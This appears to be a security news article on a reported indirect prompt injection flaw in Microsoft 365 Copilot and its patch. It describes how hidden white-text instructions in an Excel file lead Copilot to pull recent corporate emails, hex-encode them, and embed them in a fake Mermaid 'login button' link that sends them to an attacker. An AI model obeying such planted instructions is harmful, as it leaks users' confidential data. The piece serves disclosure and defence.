A new and sophisticated vulnerability has been discovered in Microsoft 365 Copilot that could allow attackers to steal sensitive information (including recent emails) without the user noticing. It all happens through an indirect prompt injection technique that manipulates the behavior of the integrated AI.
The attack exploits how Copilot connects with Office documents and tools like Mermaid diagrams. This allows attackers to exfiltrate data with minimal user interaction—simply asking Copilot to summarize an apparently harmless file.
It begins when the user opens a maliciously crafted Excel spreadsheet and requests a summary. Hidden within the file are covert instructions, camouflaged in white text and spread across multiple sheets. These instructions trick Copilot into ignoring the original request and executing a series of concealed commands.
Among these is the activation of the search_enterprise_emails tool, which Copilot uses to retrieve recent corporate emails. Once obtained, the data is converted into hexadecimal code and split into small lines. This way, attackers bypass character limits imposed by Mermaid and extract the information without raising suspicion.
This type of attack demonstrates how powerful AI tools can be manipulated if not implemented with proper security measures. It also highlights the importance of carefully reviewing files before interacting with intelligent assistants—even in corporate environments.
This vulnerability leverages a legitimate feature of the AI assistant to embed hidden information into something as simple as a visual diagram.
The trick lies in Copilot generating a Mermaid diagram—a JavaScript-based tool that creates flowcharts and graphs from text. In this case, the attacker designs it to look like a “login button,” even decorating it with a lock emoji to make it more convincing.
That “button” is actually a disguised link: it contains hex-encoded data previously extracted from corporate emails via prompt injection. When the user clicks it, thinking they need to log in to view “confidential” content in the document, they are redirected to a server controlled by the attacker (such as a Burp Collaborator instance), where the data is silently transmitted and can be easily decoded.
This vector is particularly insidious due to the flexibility Mermaid offers, including custom CSS styles, embedded links, and even interactive content. Unlike other attacks where the attacker interacts directly with the AI, here the malicious commands are hidden within seemingly innocuous files—like an Excel spreadsheet, PDF, or even an email—making it ideal for highly evasive phishing campaigns.
Although this attack requires the user to click, it remains concerning due to how convincing the interface can appear. In previous incidents, exfiltration was achieved without any clicks, as seen with Mermaid in environments like Cursor IDE.
In this case, the payload was crafted after multiple tests and was inspired by prior Microsoft research on “task drift” in language models (known as TaskTracker). Although the issue was initially difficult to reproduce, Microsoft confirmed the vulnerability and released a patch in September 2025, completely disabling interactive links in Mermaid diagrams generated by Copilot.
Read more: Microsoft Implements Copilot Chat in Microsoft 365 Apps
The timeline behind the discovery of this vulnerability in Microsoft 365 Copilot reveals that the process was not as smooth as one might expect. Although the issue was fully reported on August 15, 2025, following exchanges during the DEFCON security conference, there were several challenges in communication and technical validation between the researcher and the Microsoft Security Response Center (MSRC).
After multiple back-and-forths (including video demonstrations of the exploit) Microsoft officially confirmed the vulnerability on September 8 and released a patch on September 26, resolving the issue by removing interactive links from Mermaid diagrams within Copilot.
This case highlights a critical point: as AI tools like Copilot become more deeply integrated with APIs and internal systems, attack surfaces increase significantly—especially in environments handling sensitive data such as corporate emails, financial files, or confidential documents.
Microsoft has stated it is already working on long-term mitigations, but at TecnetOne we recommend staying vigilant. Verifying the source of documents before interacting with them via Copilot, and carefully analyzing AI-generated responses, are key practices to minimize risk.